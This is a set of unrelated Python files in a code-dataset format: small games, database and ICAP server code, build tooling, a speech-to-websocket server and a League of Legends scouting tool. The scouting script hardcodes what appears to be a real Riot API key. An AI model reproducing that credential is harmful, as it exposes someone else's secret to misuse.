(dealer.isInBegLatBJ == True):\n if (player.isWin == False):\n if (player.sum < dealer.sum):\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck * -1)\n elif (player.sum > dealer.sum):\n print(\"Player\", player.name, \"Win! He get\", int(player.deck * 1.5), \"coins!\")\n Users.setBalance(player.name, int(player.deck * 1.5))\n else:\n print(\"Player\", player.name, \"stayed at his rate!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n else:\n print(\"Player\", player.name, \"Win! 
He get\", int(player.deck * 1.5), \"coins!\")\n else:\n if (player.isLose == False):\n if (player.sum < dealer.sum):\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck * -1)\n elif (player.sum > dealer.sum):\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck)\n else:\n print(\"Player\", player.name, \"stayed at his rate!\")\n else:\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n\n #Еще в том же составе\n while True:\n print(\"\\nDo yoe want to play again (y/n)?: \", end='')\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True) == True):\n if (playerInput == 'y'):\n newList = []\n for player in players:\n if (Users.getBalance(player.name, False) <= 0):\n print(\"Player\", player.name, \"have not enough coins, he will be deleted from the session!\\n\")\n Users.rem(player.name)\n else:\n newList.append(player)\n for player in players:\n player.sum = 0\n player.isInBeginBJ = False\n player.isWin = False\n player.isLose = False\n player.listOfCards = []\n player.bet = 0\n players = newList\n break\n elif (playerInput == 'n'):\n return\n\n #return\n","sub_path":"Projects/MiniGames/BlackJack/BlackJack.py","file_name":"BlackJack.py","file_ext":"py","file_size_in_byte":13183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207931882","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 11 00:27:38 2016\n\n@author: dhuynh\n\"\"\"\n\n\nresponses={}\nflag='y'\nwhile flag=='y':\n name=raw_input('Your name is: ')\n response=raw_input('Where do you want to go for a vacation this year? ')\n responses[name]=response\n flag=raw_input('continue (y/n)? 
')\n if flag=='n':\n break\nprint(responses)\nfor name,response in responses.items():\n print(name+' wants to go to '+response+' this year.')\n \n\n","sub_path":"inputFillDictionary.py","file_name":"inputFillDictionary.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"268973592","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 19:21:28 2020\n\n@author: Micky\n\n\"\"\"\ncoordinate = []\n\n \n\nboard_numbers = range(1,16) \nboard = []\nfor i in range(3): # 3 rows\n board.append([])\n for j in range(4): # 4 columns\n board[i].append(list(coordinate)) # add a fresh copy of [] to each spot, so the cells don't all share one list\n\n\ndef print_board(board):\n for i in board:\n \n print (' '.join(map(str, i))) \nprint_board(board) # print the board; print_board() writes directly and returns None\n\n\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"230929356","text":"\"\"\"\nHive connection and read/write test. Hive is operated by executing SQL statements directly; both clients connect to the Presto service address.\n\"\"\"\n\n# drop table if exists user;\n\ndef sqlalchemy_test():\n from sqlalchemy.engine import create_engine\n import pandas as pd\n engine = create_engine('presto://192.168.11.127:30890/hive/default') # host is the server IP, port is the port, 'hive' is the Presto catalog and 'default' is the default schema, which can be swapped for another one.\n df = pd.read_sql(\"select * from day_result\", engine) # no different from reading from any other database with pandas\n print(df)\n\n\ndef pyhive_test():\n from pyhive import presto\n # access Hive through Presto; Presto also supports access via a REST API\n conn = presto.Connection(host='192.168.11.127', port=30890)\n cursor = conn.cursor()\n # sql_str = 'create table user_product(id INTEGER);'\n cursor.execute('select * from day_result')\n # cursor.execute(sql_str)\n\n result = cursor.fetchall()\n print(result)\n\n\nif __name__ == '__main__':\n pyhive_test()\n sqlalchemy_test()","sub_path":"project/database-test/py_hive.py","file_name":"py_hive.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"553571291","text":"#!/bin/env python\n# -*- coding: utf8 -*-\n\nimport random\nimport tempfile\nimport time\nimport socket\nimport collections\nimport gzip\nimport imghdr\n\ntry:\n from urllib.parse import urlparse\nexcept ImportError:\n from urlparse import urlparse\n\ntry:\n import socketserver\nexcept ImportError:\n import SocketServer\n socketserver = SocketServer\n\nimport sys\nsys.path.append('.')\n\nfrom pyicap import *\n\nclass ThreadingSimpleServer(socketserver.ThreadingMixIn, ICAPServer):\n pass\n\nclass ICAPHandler(BaseICAPRequestHandler):\n\n def service_OPTIONS(self):\n self.set_icap_response(200)\n self.set_icap_header(b'Methods', b'RESPMOD')\n self.set_icap_header(b'Service', b'PyICAP Server 1.0')\n self.set_icap_header(b'Preview', b'0')\n self.set_icap_header(b'Transfer-Preview', b'*')\n self.set_icap_header(b'Transfer-Ignore', b'bmp,ico,gif,jpg,jpe,jpeg,png,tiff,crl,avi,divx,flv,h264,mp4,mpg,mpeg,swf,wmv,mp3,wav,ttf,pdf,rar,tar,zip,gz,bz2,jar,js,json,htm,html,dhtml,shtml,css,rss,xml')\n self.set_icap_header(b'Transfer-Complete', b'')\n self.set_icap_header(b'Max-Connections', b'200')\n self.set_icap_header(b'Options-TTL', b'3600')\n self.send_headers(False)\n\n def read_into(self, f):\n while True:\n try:\n chunk = self.read_chunk()\n if chunk == b'':\n return\n f.write(chunk)\n except:\n return\n\n def service_RESPMOD(self):\n self.set_icap_response(200)\n self.set_enc_status(b' '.join(self.enc_res_status))\n for h 
in self.enc_res_headers:\n for v in self.enc_res_headers[h]:\n self.set_enc_header(h, v)\n\n if not self.has_body:\n self.send_headers(False)\n return\n with tempfile.NamedTemporaryFile(prefix='pyicap.', suffix='.tmp') as upstream:\n self.read_into(upstream)\n if self.preview and not self.ieof:\n self.cont()\n self.read_into(upstream)\n upstream.seek(0)\n try:\n with gzip.open(upstream, \"rb\") as f:\n data = f.read()\n except:\n pass\n # And write it to downstream\n upstream.seek(0)\n content = upstream.read()\n self.send_headers(True)\n self.write_chunk(content)\n \n def parse_request(self):\n \"\"\"Parse a request (internal).\n The request should be stored in self.raw_requestline; the results\n are in self.command, self.request_uri, self.request_version and\n self.headers.\n Return True for success, False for failure; on failure, an\n error is sent back.\n \"\"\"\n self.command = None\n self.request_version = version = 'ICAP/1.0'\n\n # Default behavior is to leave connection open\n self.close_connection = False\n\n requestline = self.raw_requestline.rstrip(b'\\r\\n')\n self.requestline = requestline\n self.log_error(self.requestline)\n words = requestline.split()\n if len(words) != 3:\n raise ICAPError(400, \"Bad request syntax (%r)\" % requestline)\n\n command, request_uri, version = words\n\n if version[:5] != b'ICAP/':\n raise ICAPError(400, \"Bad request protocol, only accepting ICAP\")\n\n if command not in (b'OPTIONS', b'REQMOD', b'RESPMOD'):\n raise ICAPError(501, \"command %r is not implemented\" % command)\n\n try:\n base_version_number = version.split(b'/', 1)[1]\n version_number = base_version_number.split(b\".\")\n # RFC 2145 section 3.1 says there can be only one \".\" and\n # - major and minor numbers MUST be treated as\n # separate integers;\n # - ICAP/2.4 is a lower version than ICAP/2.13, which in\n # turn is lower than ICAP/12.3;\n # - Leading zeros MUST be ignored by recipients.\n if len(version_number) != 2:\n raise ValueError\n version_number = int(version_number[0]), int(version_number[1])\n except (ValueError, IndexError):\n raise ICAPError(400, \"Bad request version (%r)\" % version)\n\n if version_number != (1, 0):\n raise ICAPError(\n 505, \"Invalid ICAP Version (%s)\" % base_version_number\n )\n\n self.command, self.request_uri, self.request_version = \\\n command, request_uri, version\n\n # Examine the headers and look for a Connection directive\n self.headers = self._read_headers()\n\n conntype = self.headers.get(b'connection', [b''])[0]\n if conntype.lower() == b'close':\n self.close_connection = True\n\n self.encapsulated = {}\n if self.command in [b'RESPMOD', b'REQMOD']:\n for enc in self.headers.get(b'encapsulated', [b''])[0].split(b','):\n # TODO: raise ICAPError if Encapsulated is malformed or empty\n if len(enc.strip().split(b'=')) > 1:\n k, v = enc.strip().split(b'=')\n self.encapsulated[k] = int(v)\n\n self.preview = self.headers.get(b'preview', [None])[0]\n self.allow = [\n x.strip() for x in self.headers.get(b'allow', [b''])[0].split(b',')\n ]\n self.client_ip = self.headers.get(\n b'x-client-ip', b'No X-Client-IP header')[0]\n\n if self.command == b'REQMOD':\n if b'req-hdr' in self.encapsulated:\n self.enc_req = self._read_request()\n self.enc_req_headers = self._read_headers()\n if b'req-body' in self.encapsulated:\n self.has_body = True\n elif self.command == b'RESPMOD':\n if b'req-hdr' in self.encapsulated:\n self.enc_req = self._read_request()\n self.enc_req_headers = self._read_headers()\n if b'res-hdr' in self.encapsulated:\n 
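# Added walk-through (illustrative header values, not taken from real traffic): a RESPMOD request\n # typically carries a header such as\n # Encapsulated: req-hdr=0, res-hdr=137, res-body=296\n # which the parsing loop above turns into byte offsets:\n # >>> hdr = b'req-hdr=0, res-hdr=137, res-body=296'\n # >>> {k: int(v) for k, v in (e.strip().split(b'=') for e in hdr.split(b','))}\n # {b'req-hdr': 0, b'res-hdr': 137, b'res-body': 296}\n # each offset is where that section starts in the encapsulated payload, which is why the\n # request line, status line and headers are read in this order while res-body only sets has_body.\n 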
self.enc_res_status = self._read_status()\n self.enc_res_headers = self._read_headers()\n if b'res-body' in self.encapsulated:\n self.has_body = True\n # Else: OPTIONS. No encapsulation.\n\n # Parse service name\n # TODO: document \"url routing\"\n self.servicename = urlparse(self.request_uri)[2].strip(b'/')\n \n def handle_one_request(self):\n def call_method():\n mname = (self.servicename + b'_' + self.command).decode(\"utf-8\")\n if not hasattr(self, mname):\n self.log_error(\"%s not found\" % mname)\n raise ICAPError(404)\n\n method = getattr(self, mname)\n if not isinstance(method, collections.Callable):\n raise ICAPError(404)\n method()\n self.close_connection = True\n \"\"\"Handle a single HTTP request.\n You normally don't need to override this method; see the class\n __doc__ string for information on how to handle specific HTTP\n commands such as GET and POST.\n \"\"\"\n\n # Initialize handler state\n self.enc_req = None\n self.enc_req_headers = {}\n self.enc_res_status = None\n self.enc_res_headers = {}\n self.has_body = False\n self.servicename = None\n self.encapsulated = {}\n self.ieof = False\n self.eob = False\n self.methos = None\n self.preview = None\n self.allow = set()\n self.client_ip = None\n\n self.icap_headers = {}\n self.enc_headers = {}\n self.enc_status = None # Seriously, need better names\n self.enc_request = None\n\n self.icap_response_code = None\n\n try:\n self.raw_requestline = self.rfile.readline(65537)\n self.log_error(self.raw_requestline)\n if not self.raw_requestline:\n self.close_connection = True\n return\n self.parse_request()\n call_method()\n self.wfile.flush()\n self.log_request(self.icap_response_code)\n except socket.timeout as e:\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = 1\n except ConnectionResetError as e:\n self.log_error(\"Connection reset error: %r\", e)\n self.close_connection = 1\n except ICAPError as e:\n msg = e.message[0] if isinstance(e.message, tuple) else e.message\n self.send_error(e.code, msg)\n #except:\n # self.send_error(500)\n\n\nport = 13440\n\nserver = ThreadingSimpleServer((b'', port), ICAPHandler)\ntry:\n while 1:\n server.handle_request()\nexcept KeyboardInterrupt:\n print(\"Finished\")\n","sub_path":"respmod_copy2.py","file_name":"respmod_copy2.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"570474925","text":"import logging\nimport os\nimport shutil\nimport subprocess\nimport sys\n\nfrom .config import PHRTOS_PROJECT_DIR, DEFAULT_TARGETS\n\n\nclass TargetBuilder:\n \"\"\"A base class that builds image needed to run all test cases\"\"\"\n\n TARGETS = DEFAULT_TARGETS\n SYSPAGE = {\n 'ia32-generic': [\n 'uart16550',\n 'pc-ata',\n 'psh'\n ]\n }\n\n def __init__(self, target):\n if target not in TargetBuilder.TARGETS:\n raise ValueError(f\"invalid target: {target}\")\n\n self.env = os.environ.copy()\n self.target = target\n self.fs_path = PHRTOS_PROJECT_DIR / f\"_fs/{self.target}\"\n\n self.env['TARGET'] = self.target\n self.env['CONSOLE'] = 'serial'\n self.env['SYSPAGE'] = ' '.join(TargetBuilder.SYSPAGE[self.target])\n\n def __str__(self):\n return self.target\n\n def fs_mkdir(self, path):\n if path.anchor == '/':\n path = path.relative_to('/')\n abs_path = self.fs_path / path\n abs_path.mkdir(exist_ok=True)\n\n def fs_install(self, path, file, mode):\n if path.anchor == '/':\n path = path.relative_to('/')\n abs_path = self.fs_path / path\n shutil.copy(file, abs_path)\n 
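# Added note (commentary, not in the original): shutil.copy() drops the file into the target\n # directory inside the root fs image, and the chmod below then sets its permission bits.\n # A minimal usage sketch, assuming a configured workdir (paths and names are hypothetical):\n #\n # from pathlib import Path\n # builder = TargetBuilder('ia32-generic')\n # builder.fs_mkdir(Path('/bin'))\n # builder.fs_install(Path('/bin'), Path('_build/psh'), 0o755)\n #\n # which copies _build/psh into <fs_path>/bin and marks it executable.\n 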
abs_path.joinpath(file.name).chmod(mode)\n\n def run_command(self, args, live_output=True, exit_at_error=True):\n proc = subprocess.Popen(\n args,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n env=self.env,\n cwd=PHRTOS_PROJECT_DIR\n )\n\n while live_output:\n output = proc.stdout.readline().decode('utf-8')\n if proc.poll() is not None and output == '':\n break\n if output:\n logging.info(output)\n\n out, err = proc.communicate()\n if proc.returncode != 0:\n logging.error(f\"Command {' '.join(args)} for {self.target} failed!\\n\")\n else:\n logging.debug(f\"Command {' '.join(args)} for {self.target} success!\\n\")\n\n logging.error(err.decode('utf-8'))\n if not live_output:\n logging.info(out.decode('utf-8'))\n\n if proc.returncode != 0 and exit_at_error:\n sys.exit(1)\n\n return proc.returncode, out, err\n\n def build(self):\n logging.info(f\"Building {self.env['TARGET']} with syspage: {self.env['SYSPAGE']}\\n\")\n self.run_command(['./phoenix-rtos-build/build.sh',\n 'clean',\n 'core',\n 'fs',\n 'test',\n 'image',\n 'project'])\n","sub_path":"trunner/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"186521233","text":"import numpy as np\n\ndocs = [[\"リンゴ\", \"リンゴ\"], [\"リンゴ\", \"レモン\"], [\"レモン\", \"ミカン\"]]\nterms = [\"リンゴ\", \"レモン\", \"ミカン\"]\n\ndef idf(term, docs):\n count = 0\n for doc in docs:\n if term in doc:\n count += 1\n return np.log10(len(docs) / count) + 1\n\nfor term in terms:\n print(\"idf({0}) = {1}\".format(term, idf(term, docs)))","sub_path":"p1_python演習/myanswer/a14.py","file_name":"a14.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"56355801","text":"import speech_recognition as sr\r\nimport asyncio\r\nimport datetime\r\nimport random\r\nimport websockets\r\nfrom datetime import datetime\r\nimport json\r\n\r\n\r\nasync def time(websocket, path):\r\n while True:\t\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Parler\")\r\n audio = r.listen(source)\r\n now = datetime.now()\r\n dateTime = now.strftime(\"%d/%m/%Y à %H:%M:%S\")\r\n try:\r\n data = r.recognize_google(audio, language='fr-FR')\r\n print(\"A \" + dateTime + \" vous avez dit: \" + data)\r\n if(data == \"red background\"):\r\n await websocket.send(json.dumps({'type': 'commande', 'typeC': 'background', 'color': 'red'}))\r\n else:\r\n await websocket.send(json.dumps({'type': 'text', 'dateTime': \"Le \" + dateTime + \" : \", 'text': data}))\r\n #await websocket.send(\"Le \" + dateTime + \" : \" + data)\r\n except sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\r\n await asyncio.sleep(random.random() * 3)\r\n\r\nstart_server = websockets.serve(time, \"127.0.0.1\", 5678)\r\nasyncio.get_event_loop().run_until_complete(start_server)\r\nasyncio.get_event_loop().run_forever()","sub_path":"back/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"633234758","text":"import io\nimport logging\nimport os\nimport zipfile\n\nfrom django.contrib.gis.geos.point import Point\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_zipfile_bytesio(base_dir):\n zip_file = 
io.BytesIO()\n\n with zipfile.ZipFile(zip_file, \"w\",\n compression=zipfile.ZIP_DEFLATED) as zf:\n path = os.path.normpath(base_dir)\n if path != os.curdir and path != base_dir:\n zf.write(path, os.path.relpath(path, base_dir))\n logger.info(\"adding '%s'\", path)\n for dirpath, dirnames, filenames in os.walk(base_dir):\n for name in sorted(dirnames):\n path = os.path.normpath(os.path.join(dirpath, name))\n zf.write(path, os.path.relpath(path, base_dir))\n logger.info(\"adding '%s'\", path)\n for name in filenames:\n path = os.path.normpath(os.path.join(dirpath, name))\n if os.path.isfile(path):\n zf.write(path, os.path.relpath(path, base_dir))\n logger.info(\"adding '%s'\", path)\n\n return zip_file\n\n\nclass ChunkIterator:\n\n def __init__(self, iterator, chunksize):\n self.iterator = iterator\n self.chunksize = chunksize\n\n def __iter__(self):\n return self\n\n def __next__(self):\n # the finally block means a StopIteration raised by the source iterator\n # either returns the final, partial chunk or ends the iteration cleanly\n try:\n chunk = []\n for i in range(self.chunksize):\n chunk.append(next(self.iterator))\n finally:\n if chunk:\n return chunk\n else:\n raise StopIteration\n\n def next(self):\n return self.__next__()\n\n\nclass GeometryDefiner:\n LONGITUDE = 'longitude'\n LATITUDE = 'latitude'\n\n @staticmethod\n def get_geometry(column_names, row):\n if not isinstance(column_names, dict):\n return None\n if sorted(column_names.keys()) == [GeometryDefiner.LATITUDE,\n GeometryDefiner.LONGITUDE]:\n lat_column = column_names.get(GeometryDefiner.LATITUDE)\n long_column = column_names.get(GeometryDefiner.LONGITUDE)\n if all(row.get(column) for column in [long_column, lat_column]):\n x = float(row.get(long_column))\n y = float(row.get(lat_column))\n return Point(x, y)\n return None\n","sub_path":"geostore/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"310550775","text":"\"\"\"\r\nThreaded Reader\r\n\r\nThis wraps the reader classes to read multiple partitions concurrently.\r\n\r\nInternally it uses Queues to create the set of partitions to read from\r\nand to communicate what has been read. The number of threads and the number\r\nof items to put on the queues are limited - otherwise the readers are\r\nlikely to exhaust the memory available and crash the app.\r\n\r\nThe threaded reader is opinionated for datasets partitioned on filesystems\r\nor in blobs, where one dataset is split over multiple resources able to be\r\nconcurrently read and there is a delay associated with reading the data,\r\nsuch as reading over a network or slow storage. 
Use in other situations\r\n(for example the MongoDB reader, or where files are on local SSD storage)\r\nmay be detrimental to performance.\r\n\r\nThe number of Queue slots and the size of the chunks have had various\r\ncombinations tried; there may be performance improvements with larger\r\nnumbers for each, but it is not within the resolution of my system to be\r\nable to measure them.\r\n\"\"\"\r\nimport queue\r\nimport threading\r\nimport sys\r\nimport time\r\nfrom ...formats import dictset\r\n\r\ndef threaded_reader(items_to_read, reader, max_threads=4):\r\n \"\"\"\r\n Speed up reading sets of files - such as multiple days' worth of log-per-day\r\n files.\r\n\r\n If you care about the order of the records, don't use this.\r\n\r\n Each file is read in its own thread, so reading a single file wouldn't benefit\r\n from this approach.\r\n \"\"\"\r\n thread_pool = []\r\n\r\n def thread_process():\r\n \"\"\"\r\n The process inside the threads.\r\n\r\n 1) Get any files off the file queue\r\n 2) Read the file in chunks\r\n 3) Put a chunk onto a reply queue\r\n \"\"\"\r\n try:\r\n source = source_queue.pop(0)\r\n except IndexError:\r\n source = None\r\n while source:\r\n source_reader = reader.read_from_source(source)\r\n for chunk in dictset.page_dictset(source_reader, 256):\r\n reply_queue.put(chunk) # this will wait until there's a slot\r\n try:\r\n source = source_queue.pop(0)\r\n except IndexError:\r\n source = None\r\n\r\n\r\n source_queue = items_to_read.copy()\r\n\r\n # scale the number of threads; if we have more threads than the number of files\r\n # we're reading, we will have threads that never complete\r\n t = min(len(source_queue), max_threads, 8)\r\n reply_queue = queue.Queue(t * 8)\r\n\r\n # start the threads\r\n for _ in range(t):\r\n thread = threading.Thread(target=thread_process)\r\n thread.daemon = True\r\n thread.start()\r\n thread_pool.append(thread)\r\n time.sleep(0.01) # offset the start of the threads\r\n\r\n # when the threads are all complete and all the records have been read from\r\n # the reply queue, we're done\r\n while any([t.is_alive() for t in thread_pool]) or not reply_queue.empty():\r\n try:\r\n # don't wait forever\r\n records = reply_queue.get(timeout=10) \r\n yield from records\r\n except queue.Empty:\r\n pass # the most likely reason for being here is a race condition","sub_path":"gva/data/readers/internals/threaded_reader.py","file_name":"threaded_reader.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"266880854","text":"import cassiopeia\nfrom datetime import *\nimport arrow\nimport copy\nfrom tkinter import *\nclass scout():\n\tdef __init__(this,playername,filters):\n\t\t#filter[type]\n\t\tthis.player = playername\n\t\tthis.summoner = this.getsummoner()\n\t\tthis.filters = filters\n\t\t#this.accounts = this.getaccounts()\n\t\tthis.matchlist = this.loadmatchlist()\n\t\tthis.analyzis_numbers = this.analyze()\n\n\tdef loadmatchlist(this):\n\t\tbegin_time = datetime.now()\n\t\tfourteen_days = timedelta(days=14)\n\t\tbegin_time = begin_time-fourteen_days\n\t\tbegin_time = arrow.get(begin_time)\n\t\tthis.cass_matchlist = cassiopeia.get_match_history(this.summoner,begin_time = begin_time,queues=[cassiopeia.Queue.ranked_solo_fives],seasons=[cassiopeia.Season.season_9])\n\t\treal_matchlist = []\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tmatch = this.cass_matchlist.pop()\n\t\t\t\treal_matchlist.append(cassiopeia.Match(id=match.id))\n\n\t\t\texcept Exception as 
e:\n\t\t\t\treal_matchlist.reverse()\n\t\t\t\tthis.cass_matchlist = cassiopeia.get_match_history(this.summoner,begin_time = begin_time,queues=[cassiopeia.Queue.ranked_solo_fives],seasons=[cassiopeia.Season.season_9])\n\t\t\t\treturn real_matchlist\n\n\tdef getsummoner(this):\n\t\treturn cassiopeia.get_summoner(name = this.player)\n\n\tdef analyze(this):\n\t\ttoret = {}\n\t\ttoret[\"kills\"]=0\n\t\ttoret[\"deaths\"]=0\n\t\ttoret[\"assists\"]=0\n\t\ttoret[\"vision_score\"]=0\n\t\ttoret[\"gold_spent\"]=0\n\t\ttoret[\"vision_wards_bought_in_game\"]=0\n\t\ttoret[\"total_damage_dealt_to_champions\"]=0\n\t\ttoret[\"time_CCing_others\"]=0\n\t\ttoret[\"time_played\"]=0\n\t\ttoret[\"champions\"]=[]\n\t\tfor match in this.matchlist:\n\t\t\tparticipants = match.participants\n\t\t\tdef is_this(participant):\n\t\t\t\treturn participant.summoner.account_id == this.summoner.account_id\n\t\t\tplayer = list(filter(is_this, participants))[0]\n\t\t\tmatch_stats = player.stats\n\t\t\ttoret[\"kills\"]+=match_stats.kills\n\t\t\ttoret[\"deaths\"]+=match_stats.deaths\n\t\t\ttoret[\"assists\"]+=match_stats.assists\n\t\t\ttoret[\"vision_score\"]+=match_stats.vision_score\n\t\t\ttoret[\"gold_spent\"]+=match_stats.gold_spent/(match.duration.total_seconds()/60)\n\t\t\ttoret[\"vision_wards_bought_in_game\"]+=match_stats.vision_wards_bought_in_game\n\t\t\ttoret[\"total_damage_dealt_to_champions\"]+=match_stats.total_damage_dealt_to_champions\n\t\t\ttoret[\"time_CCing_others\"]+=match_stats.time_CCing_others\n\t\ttoret[\"kills\"]=toret[\"kills\"]/len(this.matchlist)\n\t\ttoret[\"deaths\"]=toret[\"deaths\"]/len(this.matchlist)\n\t\ttoret[\"assists\"]=toret[\"assists\"]/len(this.matchlist)\n\t\ttoret[\"vision_score\"]=toret[\"vision_score\"]/len(this.matchlist)\n\t\ttoret[\"gold_spent\"]=toret[\"gold_spent\"]/len(this.matchlist)\n\t\ttoret[\"vision_wards_bought_in_game\"]=toret[\"vision_wards_bought_in_game\"]/len(this.matchlist)\n\t\ttoret[\"total_damage_dealt_to_champions\"]=toret[\"total_damage_dealt_to_champions\"]/len(this.matchlist)\n\t\ttoret[\"time_CCing_others\"]=toret[\"time_CCing_others\"]/len(this.matchlist)\n\t\treturn toret\n\n\tdef get_frame(this,root):\n\t\tthis.playerinfo = LabelFrame(root)\n\t\tplayername = Label(this.playerinfo,text=this.player)\n\t\tplayername.pack()\n\n\t\tleagueentry = list(this.summoner.league_entries(region = \"EUW\").filter(lambda x:x.queue==cassiopeia.Queue.ranked_solo_fives))[0]\n\t\tplayerrank = Label(this.playerinfo,text=str(leagueentry.tier)+\" \"+str(leagueentry.division))\n\t\tplayerrank.pack()\n\t\tthis.playerinfo.pack(side=LEFT)\n\t\tthis.matchesframe = Frame(root)\n\t\tthis.matchesframe.pack(side = LEFT)\n\t\tthis.matchframes = []\n\n\t\tfor match in this.matchlist:\n\n\t\t\tparticipants = match.participants\n\t\t\tdef is_this(participant):\n\t\t\t\treturn participant.summoner.account_id == this.summoner.account_id\n\t\t\tplayer = list(filter(is_this, participants))[0]\n\t\t\tmatch_stats = player.stats\n\n\t\t\t\n\t\t\tif match_stats.win:\n\t\t\t\tfr = LabelFrame(this.matchesframe,text=match.creation.format('YYYY-MM-DD'),background=\"blue\",width=root.winfo_reqwidth()/4)\n\t\t\telse:\n\t\t\t\tfr = LabelFrame(this.matchesframe,text=match.creation.format('YYYY-MM-DD'),background=\"red\",width=root.winfo_reqwidth()/4)\n\t\t\tthis.matchframes.append(fr)\n\t\t\tfr.grid_propagate(0)\n\n\t\t\tchampion = Label(fr,text = player.champion.name)\n\t\t\tchampion.pack(side = LEFT)\n\n\t\t\tkda = Label(fr,text = 
str(match_stats.kills)+\"/\"+str(match_stats.deaths)+\"/\"+str(match_stats.assists))\n\t\t\tkda.pack(side = RIGHT)\n\n\t\t\tfr.pack(fill=X)\n\t\tthis.statsframe = Frame(root)\n\t\tthis.statsframe.pack(side = RIGHT)\n\n\t\tthis.statframes = []\n\t\tindex = 0\n\t\tfor stat in this.analyzis_numbers.keys():\n\t\t\tfr = LabelFrame(this.statsframe,text = stat,width=root.winfo_reqwidth()*0.75)\n\t\t\tprint(this.analyzis_numbers[stat])\n\t\t\ttry:\n\t\t\t\trounded = round(this.analyzis_numbers[stat],2)\n\t\t\texcept Exception as e:\n\t\t\t\trounded = this.analyzis_numbers[stat]\n\t\t\t\n\t\t\tlb = Label(fr,text = str(rounded))\n\t\t\tthis.statframes.append(fr)\n\n\t\t\tfr.grid(row=index,sticky = \"we\")\n\n\t\t\tlb.pack(side=LEFT)\n\t\t\tindex+=1\n\n\n\n\ndef create_filter():\n\ttoret = {}\n\ttoret[\"begin_index\"]=None\n\ttoret[\"end_index\"]=None\n\ttoret[\"begin_time\"]=None\n\ttoret[\"end_time\"]=None\n\ttoret[\"queues\"]=420\n\ttoret[\"seasons\"]=None\n\ttoret[\"champions\"]=None\n\treturn toret\n\ncassiopeia.set_riot_api_key(\"RGAPI-a83c87b7-1d63-49a8-8d80-7f3e7ed4a38b\")\ncassiopeia.set_default_region(\"EUW\")\n\nfilters = create_filter()\n\nsc = (scout(\"OPY Yasuneri\",filters))\n\nfenetre = Tk()\nfenetre.geometry(\"500x500\")\nlabel = LabelFrame(fenetre,width=1200)\nsc.get_frame(label)\nlabel.pack()\n\nfenetre.mainloop()","sub_path":"scouting.py","file_name":"scouting.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"860213","text":"import os\r\n\r\nclass History():\r\n\tfname = os.path.join(\"info\", \"history.txt\")\r\n\tdef save(str):\r\n\t\t\"\"\"Добавляет к файлу history.txt в самое начало переданный аргумент. Если файла нет, то он будет создан\"\"\"\r\n\t\ttry:\r\n\t\t\t\"\"\"Открытие файла на чтение+запись\"\"\"\r\n\t\t\twith open(History.fname, \"r+\") as fp_w:\r\n\t\t\t\t\"\"\"Считывание файла\"\"\"\r\n\t\t\t\tlines = fp_w.readlines()\r\n\t\t\t\t\"\"\"Переход указателя на файл в самое начало\"\"\"\r\n\t\t\t\tfp_w.seek(0)\r\n\t\t\t\t\"\"\"Запись в файл данных, которые было изначально с данными, полученными в функцию\"\"\"\r\n\t\t\t\tfp_w.writelines(list(str) + lines)\r\n\t\texcept FileNotFoundError:\r\n\t\t\t\"\"\"В случае отсутствия файла history.txt - создать его и вызвать функцию еще раз\"\"\"\r\n\t\t\twith open(History.fname, \"w\") as create:\r\n\t\t\t\tHistory.save(str)\r\n\r\n\tdef load():\r\n\t\t\"\"\"Загружает данные из файла history.txt\"\"\"\r\n\t\tload = \"\"\r\n\t\twith open(History.fname, \"r\") as fp_r:\r\n\t\t\t\"\"\"Считывает данные из файла\"\"\"\r\n\t\t\tload = fp_r.readlines()\r\n\t\tret = \"\"\r\n\t\t\"\"\"Так как данные из файла считываются в список строк, то нужно их пр��образовать в строку\"\"\"\r\n\t\tfor i in load:\r\n\t\t\tret += i\r\n\t\treturn ret\r\n\r\n\tdef clear():\r\n\t\t\"\"\"Очищает файл history.txt\"\"\"\r\n\t\twith open(History.fname, \"w\") as 